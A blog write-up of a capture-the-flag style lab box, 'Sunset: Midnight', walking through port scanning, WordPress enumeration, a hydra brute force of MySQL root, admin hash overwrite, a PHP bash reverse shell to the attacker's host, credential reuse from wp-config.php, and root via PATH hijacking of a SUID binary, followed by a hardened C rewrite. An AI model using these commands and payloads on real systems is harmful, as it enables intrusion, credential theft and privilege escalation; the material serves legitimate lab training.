1. Host discovery and information gathering
(1) Information gathering
arp-scan -l
(2) Setting an environment variable
export ip=192.168.1.135
(3) Port scan
nmap --min-rate 10000 -p- $ip
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
(4) Service enumeration
nmap -sS -sV -O -p22,80,3306 $ip
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
3306/tcp open  mysql   MariaDB 5.5.5-10.3.22
MAC Address: 00:50:56:3C:94:80 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
(5) Nmap script scan
nmap --script=vuln -p22,80,3306 $ip
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|   /blog/: Blog
|   /wp-login.php: Possible admin folder
|   /wp-json: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: WordPress version: 2
|   /feed/: WordPress version: 5.4.2
|   /wp-includes/images/rss.png: WordPress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: WordPress version 2.5 found.
|   /wp-includes/images/blank.gif: WordPress version 2.6 found.
|   /wp-includes/js/comment-reply.js: WordPress version 2.7 found.
|   /wp-login.php: WordPress login page.
|   /wp-admin/upgrade.php: WordPress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|   /contact/: Potentially interesting folder
|_  /home/: Potentially interesting folder
3306/tcp open  mysql
MAC Address: 00:50:56:3C:94:80 (VMware)
or
nikto -h 192.168.1.135
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.1.135
+ Target Hostname:    192.168.1.135
+ Target Port:        80
+ Start Time:         2025-04-07 00:47:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://sunset-midnight/
+ /aCOYkcj5.axd: Drupal Link header found with value: <http://sunset-midnight/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /home/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /wp-app.log: WordPress' wp-app.log may leak application/system details.
+ /wordpress/wp-app.log: WordPress' wp-app.log may leak application/system details.
+ /wordpress/: A WordPress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: WordPress uploads directory is browsable. This may reveal sensitive information.
+ /wp-login.php: WordPress login found.
+ 8108 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2025-04-07 00:50:01 (GMT-4) (123 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
2. Starting the penetration test
(1) Port 22
Known vulnerabilities (N-day)
┌──(root㉿kali)-[/home/kali/bc]
└─# searchsploit OpenSSH 7.9
Exploits: No Results
Shellcodes: No Results
Brute force
At this point we know nothing about the users on the box, so we skip this step for now and gather information from the web application first.
(2) Port 80: web application
Visiting the site
Visiting the IP directly does not get us to the site: it redirects to the hostname sunset-midnight, so we first need a hosts mapping so that this name resolves to the target IP.
Windows: edit C:\Windows\System32\drivers\etc\hosts
Linux: edit /etc/hosts
In either case add the line: 192.168.1.135 sunset-midnight

After that the site loads normally, and it turns out to be a WordPress site.

Visit http://sunset-midnight/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Back-end login page: http://sunset-midnight/wp-login.php?redirect_to=http%3A%2F%2Fsunset-midnight%2Fwp-admin%2F&reauth=1

Not much more to find by hand, so we scan the site with wpscan.
Plain scan:
wpscan --url http://sunset-midnight
[+] URL: http://sunset-midnight/ [192.168.1.135]
[+] Started: Mon Apr  7 01:23:38 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://sunset-midnight/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://sunset-midnight/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-11-12T00:00:00.000Z
 | Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.8
 | Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] simply-poll-master
 | Location: http://sunset-midnight/wp-content/plugins/simply-poll-master/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <=========================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Apr  7 01:23:43 2025
[+] Requests Done: 172
[+] Cached Requests: 7
[+] Data Sent: 43.303 KB
[+] Data Received: 444.822 KB
[+] Memory used: 273.512 MB
[+] Elapsed time: 00:00:04
From this output we have found the admin user, which we can try to brute-force, and we have the version, 5.4.2, so we can look for known vulnerabilities (N-day).
N-day: this would need a plugin, and there is none.

So we try brute force, then move on to 3306.
wpscan --url http://sunset-midnight/ -P /usr/share/wordlists/rockyou.txt -U admin
Nothing came out of the brute force either, but 3306 paid off.
(3) Port 3306: database
Here we simply brute-force the login.
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.1.135
(If the wordlist is not present yet, go to that directory first and decompress it with gunzip.)
┌──(root㉿kali)-[/home/kali/bc]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.1.135
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-07 01:11:50
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.1.135:3306/
[STATUS] 12.00 tries/min, 12 tries in 00:01h, 14344387 to do in 19922:46h, 4 active
[STATUS] 12.00 tries/min, 36 tries in 00:03h, 14344363 to do in 19922:44h, 4 active
[3306][mysql] host: 192.168.1.135   login: root   password: robert
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-07 01:18:45
Found a valid credential pair: root / robert
mysql -h 192.168.1.135 -u root -p
My newer mysql client threw an error here:
┌──(root㉿kali)-[/home/kali]
└─# mysql -h 192.168.1.135 -u root -p
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
mysql -h 192.168.1.135 -u root -p --ssl=0
show databases; (list the databases)
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress_db       |
+--------------------+
use wordpress_db (select a database)
show tables; (list the tables)
+------------------------+
| Tables_in_wordpress_db |
+------------------------+
| wp_commentmeta         |
| wp_comments            |
| wp_links               |
| wp_options             |
| wp_postmeta            |
| wp_posts               |
| wp_sp_polls            |
| wp_term_relationships  |
| wp_term_taxonomy       |
| wp_termmeta            |
| wp_terms               |
| wp_usermeta            |
| wp_users               |
+------------------------+
select * from wp_users; (view the rows in the table)
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url               | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin         | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
The admin password is stored as a WordPress portable hash (the $P$ prefix), a salted and iterated MD5 scheme. Online lookup sites tried:
pmd5.com
ttmd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash
None of the online cracking sites recovered it.
Since we have root on the database anyway, we simply overwrite the hash.
Here we just use the MD5() function: WordPress still accepts a legacy 32-character MD5 hash and upgrades it on the next login.
update wp_users set user_pass = MD5('123456') where ID=1; (overwrite with a direct update)
Then visit
http://sunset-midnight/wp-login.php?redirect_to=http%3A%2F%2Fsunset-midnight%2Fwp-admin%2F&reauth=1
admin / 123456
and we are straight in.

Prepare a PHP reverse shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.133/4444 0>&1'");?>
Then start a listener in Kali
nc -nvlp 4444
Paste the code in here directly

Visit http://sunset-midnight/404.php and we get the shell.
3. Initial foothold

4. Privilege escalation
ls
First look at the config file
cat wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'jose' );

/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '9F#)Pk/=&SyQ/>UVRBXx$}e&>G@(+m6L|_{Emur&fv&fO_+wbJ`-6QnE_7hI|Y<p');
define('SECURE_AUTH_KEY',  'p#Eh5#4W~p4-Iue2M)H/?[dp`BS;$7o~Kb%F?&S-Zv=rH#;U%`9G#VR`l^,8j$M+');
define('LOGGED_IN_KEY',    '0{YUw?X%j+ej-0du&FW@QkVP?b(#QsQfu[Q%<QS_Lpc1UI1|st:EJr)d*$g/iJ18');
define('NONCE_KEY',        '%)thH*l;)A^S#8WQ!8TKAnQ;uNXNKv<f.|PyYijgztda70y-4m~DTyqr^X!$JwX#');
define('AUTH_SALT',        '<Kd5.3^|yo:/fw2Y|PTb4!bU~5uRv7Z(n0;~jOXoO7MC]j/ICu[tY!)g4Oah-{oa');
define('SECURE_AUTH_SALT', 'dmYQvQ1Ap&z~JUHUaKR6]<rm7^ydGAp(/EH&+vrAi6cBpi?F7XKTc@Ahm:|h*wR;');
define('LOGGED_IN_SALT',   '5+Iw-;-j+2rD3WgRtSM`!zDb5I%LLU0]Awk-Cma:f4xrJv%k~/@+TthXY_[JpjfK');
define('NONCE_SALT',       'iDo3}y9z;@c~a)ZLT:7|.ZCp-0sK4>T1p&%MhGt_TUu+HFpPjn-no`:8sI0BA);y');
/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
User jose, password 645dc5a8871d2a4269d4cbe23f6ae103
The password cannot be cracked, so we try logging in with it as-is
su jose
Password: 645dc5a8871d2a4269d4cbe23f6ae103

Well, it was not a hash after all: the plaintext logged us straight in.
Upgrade to an interactive shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
SUID binaries
find / -perm -u=s -ls 2>/dev/null

One immediately stands out: /usr/bin/status, which is not a standard system tool.
jose@midnight:/home$ status
● ssh.service - OpenBSD Secure Shell server
   Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)
   Active: active (running) since Mon 2025-04-07 03:33:00 EDT; 1h 21min ago
     Docs: man:sshd(8)
           man:sshd_config(5)
  Process: 539 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
 Main PID: 552 (sshd)
    Tasks: 1 (limit: 1148)
   Memory: 3.6M
   CGroup: /system.slice/ssh.service
           └─552 /usr/sbin/sshd -D

Apr 07 03:33:00 midnight systemd[1]: Starting OpenBSD Secure Shell server...
Apr 07 03:33:00 midnight sshd[552]: Server listening on 0.0.0.0 port 22.
Apr 07 03:33:00 midnight sshd[552]: Server listening on :: port 22.
Apr 07 03:33:00 midnight systemd[1]: Started OpenBSD Secure Shell server.
strings /usr/bin/status (look for strings hard-coded into the program)
jose@midnight:/home$ strings /usr/bin/status
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Status of the SSH server: 
service ssh status
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
status.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
We can see that the program calls the system() function and runs the command service ssh status.
Since the command is given without a path, we can hijack it through PATH to escalate privileges.
echo $PATH (note down the original PATH first)
Malicious script
echo '/bin/bash -p' > /tmp/service
chmod +x /tmp/service
Hijack PATH
export PATH=/tmp:$PATH
Run it
/usr/bin/status
Typing id shows that we are now root.
Afterwards the PATH variable can be restored to its original value.
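The weakness in the status binary as it follows from the strings output above, beside the form a defender would ship instead. This is an added C example, not the box's own source: the setuid/setgid/system body is reconstructed from the symbol and string names and is an assumption, and path_has_untrusted_entry and run_status_hardened are hypothetical helpers written for this example.

```c
#define _GNU_SOURCE                     /* clearenv(), setenv() */
#include <limits.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* As far as its strings output shows, the set-uid /usr/bin/status from the write-up does roughly
 *   setuid(0); setgid(0); system("service ssh status");      (reconstruction, not its source)
 * system() hands the line to /bin/sh, which resolves the bare word "service" through the caller's
 * PATH, so an entry such as /tmp placed first lets the caller decide what runs as root. */
#define HARDENED_PATH "/usr/sbin:/usr/bin:/sbin:/bin"   /* imposed by the helper, never inherited */

/* Audit a PATH string: return 1 if any entry could be controlled by an unprivileged caller, i.e. an
 * empty entry (the shell treats it as "."), a relative entry, or a world-writable directory such as
 * /tmp; 0 otherwise. Only the directory itself is checked, and nonexistent entries are skipped. */
int path_has_untrusted_entry(const char *path)
{
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        char entry[PATH_MAX];
        struct stat st;
        if (len == 0 || p[0] != '/' || len >= sizeof entry)
            return 1;
        memcpy(entry, p, len);
        entry[len] = '\0';
        if (stat(entry, &st) == 0 && (st.st_mode & S_IWOTH))
            return 1;
        if (!end) return 0;
        p = end + 1;
    }
}

/* Hardened replacement for the system() call: fixed PATH, absolute program path and a fixed argv
 * passed to execv(), so neither PATH lookup nor shell parsing is involved. No setuid(0) either:
 * querying a service's status needs no root. Returns the child's exit status, or -1 on failure. */
int run_status_hardened(void)
{
    char *const argv[] = { "/usr/sbin/service", "ssh", "status", NULL };
    int status;
    pid_t pid;
    if (clearenv() != 0 || setenv("PATH", HARDENED_PATH, 1) != 0)
        return -1;
    if ((pid = fork()) < 0) return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A one-line main that calls path_has_untrusted_entry(getenv("PATH")) turns the first function into a quick audit of the current shell's PATH, which would flag the /tmp:... value set in the steps above.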
5. Privilege escalation complete

Unless otherwise stated, all articles on this blog are the author's original work.
If you repost, please credit the source: https://www.oneblanks.xyz/sunset-midnight%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/